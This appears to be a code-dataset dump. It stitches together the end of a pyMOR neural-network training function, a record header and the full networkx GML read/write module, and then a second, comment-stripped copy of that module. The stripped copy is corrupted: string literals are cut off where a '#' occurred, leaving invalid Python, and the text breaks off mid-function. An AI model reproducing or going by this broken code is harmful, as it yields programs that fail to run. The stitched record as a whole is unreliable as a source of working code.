training_data = [(prepare_datum(datum[0]), prepare_datum(datum[1])) for datum in training_data]
validation_data = [(prepare_datum(datum[0]), prepare_datum(datum[1])) for datum in validation_data]
optimizer = optim.LBFGS if 'optimizer' not in training_parameters else training_parameters['optimizer']
epochs = 1000 if 'epochs' not in training_parameters else training_parameters['epochs']
assert isinstance(epochs, int) and epochs > 0
batch_size = 20 if 'batch_size' not in training_parameters else training_parameters['batch_size']
assert isinstance(batch_size, int) and batch_size > 0
learning_rate = 1. if 'learning_rate' not in training_parameters else training_parameters['learning_rate']
assert learning_rate > 0.
loss_function = (nn.MSELoss() if (training_parameters.get('loss_function') is None)
else training_parameters['loss_function'])
logger = getLogger('pymor.algorithms.neural_network.train_neural_network')
# LBFGS-optimizer does not support mini-batching, so the batch size needs to be adjusted
if optimizer == optim.LBFGS:
batch_size = max(len(training_data), len(validation_data))
# initialize optimizer, early stopping scheduler and learning rate scheduler
weight_decay = training_parameters.get('weight_decay', 0.)
assert weight_decay >= 0.
if weight_decay > 0. and 'weight_decay' not in inspect.getfullargspec(optimizer).args:
optimizer = optimizer(neural_network.parameters(), lr=learning_rate)
logger.warning(f"Optimizer {optimizer.__class__.__name__} does not support weight decay! "
"Continuing without regularization!")
elif 'weight_decay' in inspect.getfullargspec(optimizer).args:
optimizer = optimizer(neural_network.parameters(), lr=learning_rate,
weight_decay=weight_decay)
else:
optimizer = optimizer(neural_network.parameters(), lr=learning_rate)
if 'es_scheduler_params' in training_parameters:
es_scheduler = EarlyStoppingScheduler(len(training_data) + len(validation_data),
**training_parameters['es_scheduler_params'])
else:
es_scheduler = EarlyStoppingScheduler(len(training_data) + len(validation_data))
if training_parameters.get('lr_scheduler'):
lr_scheduler = training_parameters['lr_scheduler'](optimizer, **training_parameters['lr_scheduler_params'])
# create the training and validation sets as well as the respective data loaders
training_dataset = CustomDataset(training_data)
validation_dataset = CustomDataset(validation_data)
training_loader = utils.data.DataLoader(training_dataset, batch_size=batch_size)
validation_loader = utils.data.DataLoader(validation_dataset, batch_size=batch_size)
dataloaders = {'train': training_loader, 'val': validation_loader}
phases = ['train', 'val']
logger.info('Starting optimization procedure ...')
if 'min_inputs' in scaling_parameters and 'max_inputs' in scaling_parameters:
min_inputs = scaling_parameters['min_inputs']
max_inputs = scaling_parameters['max_inputs']
else:
min_inputs = None
max_inputs = None
if 'min_targets' in scaling_parameters and 'max_targets' in scaling_parameters:
min_targets = scaling_parameters['min_targets']
max_targets = scaling_parameters['max_targets']
else:
min_targets = None
max_targets = None
# perform optimization procedure
for epoch in range(epochs):
losses = {'full': 0.}
# alternate between training and validation phase
for phase in phases:
if phase == 'train':
neural_network.train()
else:
neural_network.eval()
running_loss = 0.0
# iterate over batches
for batch in dataloaders[phase]:
# scale inputs and outputs if desired
if min_inputs is not None and max_inputs is not None:
inputs = (batch[0] - min_inputs) / (max_inputs - min_inputs)
else:
inputs = batch[0]
if min_targets is not None and max_targets is not None:
targets = (batch[1] - min_targets) / (max_targets - min_targets)
else:
targets = batch[1]
with torch.set_grad_enabled(phase == 'train'):
def closure():
if torch.is_grad_enabled():
optimizer.zero_grad()
outputs = neural_network(inputs)
loss = loss_function(outputs, targets)
if loss.requires_grad:
loss.backward()
return loss
# perform optimization step
if phase == 'train':
optimizer.step(closure)
# compute loss of current batch
loss = closure()
# update overall absolute loss
running_loss += loss.item() * len(batch[0])
# compute average loss
epoch_loss = running_loss / len(dataloaders[phase].dataset)
losses[phase] = epoch_loss
losses['full'] += running_loss
if log_loss_frequency > 0 and epoch % log_loss_frequency == 0:
logger.info(f'Epoch {epoch}: Current {phase} loss of {losses[phase]:.3e}')
if 'lr_scheduler' in training_parameters and training_parameters['lr_scheduler']:
lr_scheduler.step()
# check for early stopping
if phase == 'val' and es_scheduler(losses, neural_network):
logger.info(f'Stopping training process early after {epoch + 1} epochs with validation loss '
f'of {es_scheduler.best_losses["val"]:.3e} ...')
return es_scheduler.best_neural_network, es_scheduler.best_losses
return es_scheduler.best_neural_network, es_scheduler.best_losses
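# Illustrative `training_parameters` dictionary (editorial addition), as described
# in the docstring above; every key is optional and the concrete values here are
# arbitrary.
def _example_training_parameters():
    return {'optimizer': optim.Adam,                     # any optimizer from torch.optim
            'epochs': 500,
            'batch_size': 32,                            # ignored for the LBFGS optimizer
            'learning_rate': 1e-3,
            'loss_function': nn.MSELoss(),
            'lr_scheduler': optim.lr_scheduler.StepLR,
            'lr_scheduler_params': {'step_size': 10, 'gamma': 0.7},
            'es_scheduler_params': {'patience': 10, 'delta': 0.},
            'weight_decay': 1e-5}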
def multiple_restarts_training(training_data, validation_data, neural_network,
target_loss=None, max_restarts=10, log_loss_frequency=0,
training_parameters={}, scaling_parameters={}, seed=None):
"""Algorithm that performs multiple restarts of neural network training.
This method either performs a predefined number of restarts and returns
the best trained network or tries to reach a given target loss and
stops training when the target loss is reached.
See :func:`train_neural_network` for more information on the parameters.
Parameters
----------
training_data
Data to use during the training phase.
validation_data
Data to use during the validation phase.
neural_network
The neural network to train (parameters will be reset after each
restart).
target_loss
Loss to reach during training (if `None`, the network with the
smallest loss is returned).
max_restarts
Maximum number of restarts to perform.
log_loss_frequency
Frequency of epochs in which to log the current validation and
training loss. If `0`, no intermediate logging of losses is done.
training_parameters
Additional parameters for the training algorithm,
see :func:`train_neural_network` for more information.
scaling_parameters
Additional parameters for scaling inputs respectively outputs,
see :func:`train_neural_network` for more information.
seed
Seed to use for various functions in PyTorch. Using a fixed seed
makes it possible to reproduce previous results.
Returns
-------
best_neural_network
The best trained neural network.
losses
The corresponding losses.
Raises
------
NeuralNetworkTrainingFailed
Raised if the prescribed loss cannot be reached within the given
number of restarts.
"""
assert isinstance(training_parameters, dict)
assert isinstance(max_restarts, int) and max_restarts > 0
logger = getLogger('pymor.algorithms.neural_network.multiple_restarts_training')
# if applicable, set a common seed for the PyTorch initialization
# of weights and biases and further PyTorch methods for all training runs
if seed:
torch.manual_seed(seed)
# in case no training data is provided, return a neural network
# that always returns zeros independent of the input
if len(training_data) == 0 or len(training_data[0]) == 0:
for layers in neural_network.children():
for layer in layers:
torch.nn.init.zeros_(layer.weight)
layer.bias.data.fill_(0.)
return neural_network, {'full': None, 'train': None, 'val': None}
if target_loss:
logger.info(f'Performing up to {max_restarts} restart{"s" if max_restarts > 1 else ""} '
f'to train a neural network with a loss below {target_loss:.3e} ...')
else:
logger.info(f'Performing up to {max_restarts} restart{"s" if max_restarts > 1 else ""} '
'to find the neural network with the lowest loss ...')
with logger.block('Training neural network #0 ...'):
best_neural_network, losses = train_neural_network(training_data, validation_data,
neural_network, training_parameters,
scaling_parameters, log_loss_frequency)
# perform multiple restarts
for run in range(1, max_restarts + 1):
if target_loss and losses['full'] <= target_loss:
logger.info(f'Finished training after {run - 1} restart{"s" if run - 1 != 1 else ""}, '
f'found neural network with loss of {losses["full"]:.3e} ...')
return neural_network, losses
with logger.block(f'Training neural network #{run} ...'):
# reset parameters of layers to start training with a new and untrained network
for layers in neural_network.children():
for layer in layers:
if hasattr(layer, 'reset_parameters'):
layer.reset_parameters()
# perform training
current_nn, current_losses = train_neural_network(training_data, validation_data,
neural_network, training_parameters,
scaling_parameters, log_loss_frequency)
if current_losses['full'] < losses['full']:
logger.info(f'Found better neural network (loss of {current_losses["full"]:.3e} '
f'instead of {losses["full"]:.3e}) ...')
best_neural_network = current_nn
losses = current_losses
else:
logger.info(f'Rejecting neural network with loss of {current_losses["full"]:.3e} '
f'(instead of {losses["full"]:.3e}) ...')
if target_loss:
raise NeuralNetworkTrainingFailed(f'Could not find neural network with prescribed loss of '
f'{target_loss:.3e} (best one found was {losses["full"]:.3e})!')
logger.info(f'Found neural network with error of {losses["full"]:.3e} ...')
return best_neural_network, losses
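# Stand-alone usage sketch (editorial addition, illustrative only): training a small
# fully connected network directly via `multiple_restarts_training`, bypassing the
# reductor classes. Data shapes, layer sizes and parameter values are invented.
def _example_direct_training():
    rng = np.random.default_rng(42)
    inputs = rng.random((50, 2))
    targets = rng.random((50, 3))
    data = [(inputs[i], targets[i]) for i in range(50)]
    training_data, validation_data = data[:40], data[40:]
    neural_network = FullyConnectedNN([2, 16, 16, 3]).double()
    best_network, losses = multiple_restarts_training(
        training_data, validation_data, neural_network,
        max_restarts=3, training_parameters={'epochs': 100})
    return best_network, losses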
hexsha: 1c3eab124bcb39e762371cb7056763fe10435167 | size: 28,138 | ext: py | lang: Python
path: networkx/readwrite/gml.py | repo: nik0sc/networkx | head: 3d5f577f5176950473367c89fc4e2fac5fb49ce7 | license: BSD-3-Clause
"""
Read graphs in GML format.
"GML, the Graph Modelling Language, is our proposal for a portable
file format for graphs. GML's key features are portability, simple
syntax, extensibility and flexibility. A GML file consists of a
hierarchical key-value lists. Graphs can be annotated with arbitrary
data structures. The idea for a common file format was born at the
GD'95; this proposal is the outcome of many discussions. GML is the
standard file format in the Graphlet graph editor system. It has been
overtaken and adapted by several other systems for drawing graphs."
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
You will need to give some thought to how the exported data should
interact with different languages and even different Python versions.
Re-importing from GML is also a concern.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
For additional documentation on the GML file format, please see the
`GML website <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
Several example graphs in GML format may be found on Mark Newman's
`Network data page <http://www-personal.umich.edu/~mejn/netdata/>`_.
"""
from io import StringIO
from ast import literal_eval
from collections import defaultdict
from enum import Enum
from typing import Any, NamedTuple
import networkx as nx
from networkx.exception import NetworkXError
from networkx.utils import open_file
import warnings
import re
import html.entities as htmlentitydefs
__all__ = ["read_gml", "parse_gml", "generate_gml", "write_gml"]
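# A minimal illustrative example of the GML syntax described in the module
# docstring above (the labels are made up): a directed graph with two nodes and
# one edge.
#
#   graph [
#     directed 1
#     node [ id 0 label "a" ]
#     node [ id 1 label "b" ]
#     edge [ source 0 target 1 ]
#   ]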
def escape(text):
"""Use XML character references to escape characters.
Use XML character references for unprintable or non-ASCII
characters, double quotes and ampersands in a string
"""
def fixup(m):
ch = m.group(0)
return "&#" + str(ord(ch)) + ";"
text = re.sub('[^ -~]|[&"]', fixup, text)
return text if isinstance(text, str) else str(text)
def unescape(text):
"""Replace XML character references with the referenced characters"""
def fixup(m):
text = m.group(0)
if text[1] == "#":
# Character reference
if text[2] == "x":
code = int(text[3:-1], 16)
else:
code = int(text[2:-1])
else:
# Named entity
try:
code = htmlentitydefs.name2codepoint[text[1:-1]]
except KeyError:
return text # leave unchanged
try:
return chr(code)
except (ValueError, OverflowError):
return text # leave unchanged
return re.sub("&(?:[0-9A-Za-z]+|#(?:[0-9]+|x[0-9A-Fa-f]+));", fixup, text)
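# Round-trip sketch (editorial addition): `escape` replaces every character outside
# the printable ASCII range as well as '&' and '"' by a numeric XML character
# reference, and `unescape` reverses the substitution, e.g.
#   escape('π & "x"')                     -> '&#960; &#38; &#34;x&#34;'
#   unescape('&#960; &#38; &#34;x&#34;')  -> 'π & "x"'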
def literal_destringizer(rep):
"""Convert a Python literal to the value it represents.
Parameters
----------
rep : string
A Python literal.
Returns
-------
value : object
The value of the Python literal.
Raises
------
ValueError
If `rep` is not a Python literal.
"""
msg = "literal_destringizer is deprecated and will be removed in 3.0."
warnings.warn(msg, DeprecationWarning)
if isinstance(rep, str):
orig_rep = rep
try:
return literal_eval(rep)
except SyntaxError as e:
raise ValueError(f"{orig_rep!r} is not a valid Python literal") from e
else:
raise ValueError(f"{rep!r} is not a string")
@open_file(0, mode="rb")
def read_gml(path, label="label", destringizer=None):
"""Read graph in GML format from `path`.
Parameters
----------
path : filename or filehandle
The filename or filehandle to read from.
label : string, optional
If not None, the parsed nodes will be renamed according to node
attributes indicated by `label`. Default value: 'label'.
destringizer : callable, optional
A `destringizer` that recovers values stored as strings in GML. If it
cannot convert a string to a value, a `ValueError` is raised. Default
value: None.
Returns
-------
G : NetworkX graph
The parsed graph.
Raises
------
NetworkXError
If the input cannot be parsed.
See Also
--------
write_gml, parse_gml
Notes
-----
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
For additional documentation on the GML file format, please see the
`GML url <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
See the module docstring :mod:`networkx.readwrite.gml` for more details.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_gml(G, 'test.gml')
>>> H = nx.read_gml('test.gml')
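The original integer node ids can be kept instead of the string labels by
reading with `label="id"` (illustrative):
>>> H = nx.read_gml('test.gml', label="id")
>>> list(H)
[0, 1, 2, 3]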
"""
def filter_lines(lines):
for line in lines:
try:
line = line.decode("ascii")
except UnicodeDecodeError as e:
raise NetworkXError("input is not ASCII-encoded") from e
if not isinstance(line, str):
line = str(line)
if line and line[-1] == "\n":
line = line[:-1]
yield line
G = parse_gml_lines(filter_lines(path), label, destringizer)
return G
def parse_gml(lines, label="label", destringizer=None):
"""Parse GML graph from a string or iterable.
Parameters
----------
lines : string or iterable of strings
Data in GML format.
label : string, optional
If not None, the parsed nodes will be renamed according to node
attributes indicated by `label`. Default value: 'label'.
destringizer : callable, optional
A `destringizer` that recovers values stored as strings in GML. If it
cannot convert a string to a value, a `ValueError` is raised. Default
value: None.
Returns
-------
G : NetworkX graph
The parsed graph.
Raises
------
NetworkXError
If the input cannot be parsed.
See Also
--------
write_gml, read_gml
Notes
-----
This stores nested GML attributes as dictionaries in the NetworkX graph,
node, and edge attribute structures.
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
For additional documentation on the GML file format, please see the
`GML url <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
See the module docstring :mod:`networkx.readwrite.gml` for more details.
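Examples
--------
A small, illustrative graph given as a single string:
>>> G = nx.parse_gml('graph [ node [ id 0 label "a" ] node [ id 1 label "b" ] edge [ source 0 target 1 ] ]')
>>> sorted(G)
['a', 'b']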
"""
def decode_line(line):
if isinstance(line, bytes):
try:
line.decode("ascii")
except UnicodeDecodeError as e:
raise NetworkXError("input is not ASCII-encoded") from e
if not isinstance(line, str):
line = str(line)
return line
def filter_lines(lines):
if isinstance(lines, str):
lines = decode_line(lines)
lines = lines.splitlines()
yield from lines
else:
for line in lines:
line = decode_line(line)
if line and line[-1] == "\n":
line = line[:-1]
if line.find("\n") != -1:
raise NetworkXError("input line contains newline")
yield line
G = parse_gml_lines(filter_lines(lines), label, destringizer)
return G
class Pattern(Enum):
""" encodes the index of each token-matching pattern in `tokenize`. """
KEYS = 0
REALS = 1
INTS = 2
STRINGS = 3
DICT_START = 4
DICT_END = 5
COMMENT_WHITESPACE = 6
class Token(NamedTuple):
category: Pattern
value: Any
line: int
position: int
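# Illustration (not part of the original module): for a hypothetical GML line
# 'id 42', tokenize() in parse_gml_lines below yields roughly
# Token(Pattern.KEYS, 'id', 1, 1) and Token(Pattern.INTS, 42, 1, 4),
# followed by a final Token(None, None, 2, 1) marking end of input.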
LIST_START_VALUE = "_networkx_list_start"
def parse_gml_lines(lines, label, destringizer):
"""Parse GML `lines` into a graph.
"""
def tokenize():
patterns = [
r"[A-Za-z][0-9A-Za-z_]*\b", # keys
# reals
r"[+-]?(?:[0-9]*\.[0-9]+|[0-9]+\.[0-9]*)(?:[Ee][+-]?[0-9]+)?",
r"[+-]?[0-9]+", # ints
r'".*?"', # strings
r"\[", # dict start
r"\]", # dict end
r"#.*$|\s+", # comments and whitespaces
]
tokens = re.compile("|".join(f"({pattern})" for pattern in patterns))
lineno = 0
for line in lines:
length = len(line)
pos = 0
while pos < length:
match = tokens.match(line, pos)
if match is None:
m = f"cannot tokenize {line[pos:]} at ({lineno + 1}, {pos + 1})"
raise NetworkXError(m)
for i in range(len(patterns)):
group = match.group(i + 1)
if group is not None:
if i == 0: # keys
value = group.rstrip()
elif i == 1: # reals
value = float(group)
elif i == 2: # ints
value = int(group)
else:
value = group
if i != 6: # comments and whitespaces
yield Token(Pattern(i), value, lineno + 1, pos + 1)
pos += len(group)
break
lineno += 1
yield Token(None, None, lineno + 1, 1) # EOF
def unexpected(curr_token, expected):
category, value, lineno, pos = curr_token
value = repr(value) if value is not None else "EOF"
raise NetworkXError(f"expected {expected}, found {value} at ({lineno}, {pos})")
def consume(curr_token, category, expected):
if curr_token.category == category:
return next(tokens)
unexpected(curr_token, expected)
def parse_kv(curr_token):
dct = defaultdict(list)
while curr_token.category == Pattern.KEYS:
key = curr_token.value
curr_token = next(tokens)
category = curr_token.category
if category == Pattern.REALS or category == Pattern.INTS:
value = curr_token.value
curr_token = next(tokens)
elif category == Pattern.STRINGS:
value = unescape(curr_token.value[1:-1])
if destringizer:
try:
value = destringizer(value)
except ValueError:
pass
curr_token = next(tokens)
elif category == Pattern.DICT_START:
curr_token, value = parse_dict(curr_token)
else:
# Allow for string convertible id and label values
if key in ("id", "label", "source", "target"):
try:
# String convert the token value
value = unescape(str(curr_token.value))
if destringizer:
try:
value = destringizer(value)
except ValueError:
pass
curr_token = next(tokens)
except Exception:
msg = (
"an int, float, string, '[' or string"
+ " convertable ASCII value for node id or label"
)
unexpected(curr_token, msg)
else: # Otherwise error out
unexpected(curr_token, "an int, float, string or '['")
dct[key].append(value)
def clean_dict_value(value):
if not isinstance(value, list):
return value
if len(value) == 1:
return value[0]
if value[0] == LIST_START_VALUE:
return value[1:]
return value
dct = {key: clean_dict_value(value) for key, value in dct.items()}
return curr_token, dct
def parse_dict(curr_token):
# dict start
curr_token = consume(curr_token, Pattern.DICT_START, "'['")
# dict contents
curr_token, dct = parse_kv(curr_token)
# dict end
curr_token = consume(curr_token, Pattern.DICT_END, "']'")
return curr_token, dct
def parse_graph():
curr_token, dct = parse_kv(next(tokens))
if curr_token.category is not None: # EOF
unexpected(curr_token, "EOF")
if "graph" not in dct:
raise NetworkXError("input contains no graph")
graph = dct["graph"]
if isinstance(graph, list):
raise NetworkXError("input contains more than one graph")
return graph
tokens = tokenize()
graph = parse_graph()
directed = graph.pop("directed", False)
multigraph = graph.pop("multigraph", False)
if not multigraph:
G = nx.DiGraph() if directed else nx.Graph()
else:
G = nx.MultiDiGraph() if directed else nx.MultiGraph()
graph_attr = {k: v for k, v in graph.items() if k not in ("node", "edge")}
G.graph.update(graph_attr)
def pop_attr(dct, category, attr, i):
try:
return dct.pop(attr)
except KeyError as e:
raise NetworkXError(f"{category} #{i} has no '{attr}' attribute") from e
nodes = graph.get("node", [])
mapping = {}
node_labels = set()
for i, node in enumerate(nodes if isinstance(nodes, list) else [nodes]):
id = pop_attr(node, "node", "id", i)
if id in G:
raise NetworkXError(f"node id {id!r} is duplicated")
if label is not None and label != "id":
node_label = pop_attr(node, "node", label, i)
if node_label in node_labels:
raise NetworkXError(f"node label {node_label!r} is duplicated")
node_labels.add(node_label)
mapping[id] = node_label
G.add_node(id, **node)
edges = graph.get("edge", [])
for i, edge in enumerate(edges if isinstance(edges, list) else [edges]):
source = pop_attr(edge, "edge", "source", i)
target = pop_attr(edge, "edge", "target", i)
if source not in G:
raise NetworkXError(f"edge #{i} has undefined source {source!r}")
if target not in G:
raise NetworkXError(f"edge #{i} has undefined target {target!r}")
if not multigraph:
if not G.has_edge(source, target):
G.add_edge(source, target, **edge)
else:
arrow = "->" if directed else "--"
msg = f"edge #{i} ({source!r}{arrow}{target!r}) is duplicated"
raise nx.NetworkXError(msg)
else:
key = edge.pop("key", None)
if key is not None and G.has_edge(source, target, key):
arrow = "->" if directed else "--"
msg = f"edge #{i} ({source!r}{arrow}{target!r}, {key!r})"
msg2 = 'Hint: If multigraph add "multigraph 1" to file header.'
raise nx.NetworkXError(msg + " is duplicated\n" + msg2)
G.add_edge(source, target, key, **edge)
if label is not None and label != "id":
G = nx.relabel_nodes(G, mapping)
return G
def literal_stringizer(value):
"""Convert a `value` to a Python literal in GML representation.
Parameters
----------
value : object
The `value` to be converted to GML representation.
Returns
-------
rep : string
A double-quoted Python literal representing value. Unprintable
characters are replaced by XML character references.
Raises
------
ValueError
If `value` cannot be converted to GML.
Notes
-----
`literal_stringizer` is largely the same as `repr` in terms of
functionality but attempts to prefix `unicode` and `bytes` literals with
`u` and `b` to provide better interoperability of data generated by
Python 2 and Python 3.
The original value can be recovered using the
:func:`networkx.readwrite.gml.literal_destringizer` function.
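Examples
--------
An illustrative conversion of a small composite value:
>>> literal_stringizer([1, 'two'])
"[1,'two']"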
"""
msg = "literal_stringizer is deprecated and will be removed in 3.0."
warnings.warn(msg, DeprecationWarning)
def stringize(value):
if isinstance(value, (int, bool)) or value is None:
if value is True: # GML uses 1/0 for boolean values.
buf.write(str(1))
elif value is False:
buf.write(str(0))
else:
buf.write(str(value))
elif isinstance(value, str):
text = repr(value)
if text[0] != "u":
try:
value.encode("latin1")
except UnicodeEncodeError:
text = "u" + text
buf.write(text)
elif isinstance(value, (float, complex, str, bytes)):
buf.write(repr(value))
elif isinstance(value, list):
buf.write("[")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write("]")
elif isinstance(value, tuple):
if len(value) > 1:
buf.write("(")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write(")")
elif value:
buf.write("(")
stringize(value[0])
buf.write(",)")
else:
buf.write("()")
elif isinstance(value, dict):
buf.write("{")
first = True
for key, value in value.items():
if not first:
buf.write(",")
else:
first = False
stringize(key)
buf.write(":")
stringize(value)
buf.write("}")
elif isinstance(value, set):
buf.write("{")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write("}")
else:
msg = "{value!r} cannot be converted into a Python literal"
raise ValueError(msg)
buf = StringIO()
stringize(value)
return buf.getvalue()
def generate_gml(G, stringizer=None):
r"""Generate a single entry of the graph `G` in GML format.
Parameters
----------
G : NetworkX graph
The graph to be converted to GML.
stringizer : callable, optional
A `stringizer` which converts non-int/non-float/non-dict values into
strings. If it cannot convert a value into a string, it should raise a
`ValueError` to indicate that. Default value: None.
Returns
-------
lines: generator of strings
Lines of GML data. Newlines are not appended.
Raises
------
NetworkXError
If `stringizer` cannot convert a value into a string, or the value to
convert is not a string while `stringizer` is None.
Notes
-----
Graph attributes named 'directed', 'multigraph', 'node' or
'edge', node attributes named 'id' or 'label', edge attributes
named 'source' or 'target' (or 'key' if `G` is a multigraph)
are ignored because these attribute names are used to encode the graph
structure.
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
For additional documentation on the GML file format, please see the
`GML url <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
See the module docstring :mod:`networkx.readwrite.gml` for more details.
Examples
--------
>>> G = nx.Graph()
>>> G.add_node("1")
>>> print("\n".join(nx.generate_gml(G)))
graph [
node [
id 0
label "1"
]
]
>>> G = nx.OrderedMultiGraph([("a", "b"), ("a", "b")])
>>> print("\n".join(nx.generate_gml(G)))
graph [
multigraph 1
node [
id 0
label "a"
]
node [
id 1
label "b"
]
edge [
source 0
target 1
key 0
]
edge [
source 0
target 1
key 1
]
]
"""
valid_keys = re.compile("^[A-Za-z][0-9A-Za-z_]*$")
def stringize(key, value, ignored_keys, indent, in_list=False):
if not isinstance(key, str):
raise NetworkXError(f"{key!r} is not a string")
if not valid_keys.match(key):
raise NetworkXError(f"{key!r} is not a valid key")
if not isinstance(key, str):
key = str(key)
if key not in ignored_keys:
if isinstance(value, (int, bool)):
if key == "label":
yield indent + key + ' "' + str(value) + '"'
elif value is True:
# python bool is an instance of int
yield indent + key + " 1"
elif value is False:
yield indent + key + " 0"
# GML only supports signed 32-bit integers
elif value < -2 ** 31 or value >= 2 ** 31:
yield indent + key + ' "' + str(value) + '"'
else:
yield indent + key + " " + str(value)
elif isinstance(value, float):
text = repr(value).upper()
# GML requires that a real literal contain a decimal point, but
# repr may not output a decimal point when the mantissa is
# integral and hence needs fixing.
epos = text.rfind("E")
if epos != -1 and text.find(".", 0, epos) == -1:
text = text[:epos] + "." + text[epos:]
if key == "label":
yield indent + key + ' "' + text + '"'
else:
yield indent + key + " " + text
elif isinstance(value, dict):
yield indent + key + " ["
next_indent = indent + " "
for key, value in value.items():
yield from stringize(key, value, (), next_indent)
yield indent + ']'
elif isinstance(value, (list, tuple)) and key != 'label' \
and value and not in_list:
if len(value) == 1:
yield indent + key + ' ' + f'"{LIST_START_VALUE}"'
for val in value:
yield from stringize(key, val, (), indent, True)
else:
if stringizer:
try:
value = stringizer(value)
except ValueError as e:
raise NetworkXError(
f"{value!r} cannot be converted into a string"
) from e
if not isinstance(value, str):
raise NetworkXError(f"{value!r} is not a string")
yield indent + key + ' "' + escape(value) + '"'
multigraph = G.is_multigraph()
yield "graph ["
# Output graph attributes
if G.is_directed():
yield " directed 1"
if multigraph:
yield " multigraph 1"
ignored_keys = {"directed", "multigraph", "node", "edge"}
for attr, value in G.graph.items():
yield from stringize(attr, value, ignored_keys, " ")
# Output node data
node_id = dict(zip(G, range(len(G))))
ignored_keys = {"id", "label"}
for node, attrs in G.nodes.items():
yield " node ["
yield " id " + str(node_id[node])
yield from stringize("label", node, (), " ")
for attr, value in attrs.items():
yield from stringize(attr, value, ignored_keys, " ")
yield " ]"
# Output edge data
ignored_keys = {"source", "target"}
kwargs = {"data": True}
if multigraph:
ignored_keys.add("key")
kwargs["keys"] = True
for e in G.edges(**kwargs):
yield " edge ["
yield " source " + str(node_id[e[0]])
yield " target " + str(node_id[e[1]])
if multigraph:
yield from stringize("key", e[2], (), " ")
for attr, value in e[-1].items():
yield from stringize(attr, value, ignored_keys, " ")
yield " ]"
yield "]"
@open_file(1, mode="wb")
def write_gml(G, path, stringizer=None):
"""Write a graph `G` in GML format to the file or file handle `path`.
Parameters
----------
G : NetworkX graph
The graph to be converted to GML.
path : filename or filehandle
The filename or filehandle to write. Files whose names end with .gz or
.bz2 will be compressed.
stringizer : callable, optional
A `stringizer` which converts non-int/non-float/non-dict values into
strings. If it cannot convert a value into a string, it should raise a
`ValueError` to indicate that. Default value: None.
Raises
------
NetworkXError
If `stringizer` cannot convert a value into a string, or the value to
convert is not a string while `stringizer` is None.
See Also
--------
read_gml, generate_gml
Notes
-----
Graph attributes named 'directed', 'multigraph', 'node' or
'edge', node attributes named 'id' or 'label', edge attributes
named 'source' or 'target' (or 'key' if `G` is a multigraph)
are ignored because these attribute names are used to encode the graph
structure.
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
Note that while we allow non-standard GML to be read from a file, we make
sure to write GML format. In particular, underscores are not allowed in
attribute names.
For additional documentation on the GML file format, please see the
`GML url <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
See the module docstring :mod:`networkx.readwrite.gml` for more details.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_gml(G, "test.gml")
Filenames ending in .gz or .bz2 will be compressed.
>>> nx.write_gml(G, "test.gml.gz")
"""
for line in generate_gml(G, stringizer):
path.write((line + "\n").encode("ascii"))
| 34.356532
| 87
| 0.55473
|
from io import StringIO
from ast import literal_eval
from collections import defaultdict
from enum import Enum
from typing import Any, NamedTuple
import networkx as nx
from networkx.exception import NetworkXError
from networkx.utils import open_file
import warnings
import re
import html.entities as htmlentitydefs
__all__ = ["read_gml", "parse_gml", "generate_gml", "write_gml"]
def escape(text):
def fixup(m):
ch = m.group(0)
return "&#" + str(ord(ch)) + ";"
text = re.sub('[^ -~]|[&"]', fixup, text)
return text if isinstance(text, str) else str(text)
def unescape(text):
def fixup(m):
text = m.group(0)
if text[1] == "
# Character reference
if text[2] == "x":
code = int(text[3:-1], 16)
else:
code = int(text[2:-1])
else:
# Named entity
try:
code = htmlentitydefs.name2codepoint[text[1:-1]]
except KeyError:
return text # leave unchanged
try:
return chr(code)
except (ValueError, OverflowError):
return text # leave unchanged
return re.sub("&(?:[0-9A-Za-z]+|
def literal_destringizer(rep):
msg = "literal_destringizer is deprecated and will be removed in 3.0."
warnings.warn(msg, DeprecationWarning)
if isinstance(rep, str):
orig_rep = rep
try:
return literal_eval(rep)
except SyntaxError as e:
raise ValueError(f"{orig_rep!r} is not a valid Python literal") from e
else:
raise ValueError(f"{rep!r} is not a string")
@open_file(0, mode="rb")
def read_gml(path, label="label", destringizer=None):
def filter_lines(lines):
for line in lines:
try:
line = line.decode("ascii")
except UnicodeDecodeError as e:
raise NetworkXError("input is not ASCII-encoded") from e
if not isinstance(line, str):
line = str(line)
if line and line[-1] == "\n":
line = line[:-1]
yield line
G = parse_gml_lines(filter_lines(path), label, destringizer)
return G
def parse_gml(lines, label="label", destringizer=None):
def decode_line(line):
if isinstance(line, bytes):
try:
line.decode("ascii")
except UnicodeDecodeError as e:
raise NetworkXError("input is not ASCII-encoded") from e
if not isinstance(line, str):
line = str(line)
return line
def filter_lines(lines):
if isinstance(lines, str):
lines = decode_line(lines)
lines = lines.splitlines()
yield from lines
else:
for line in lines:
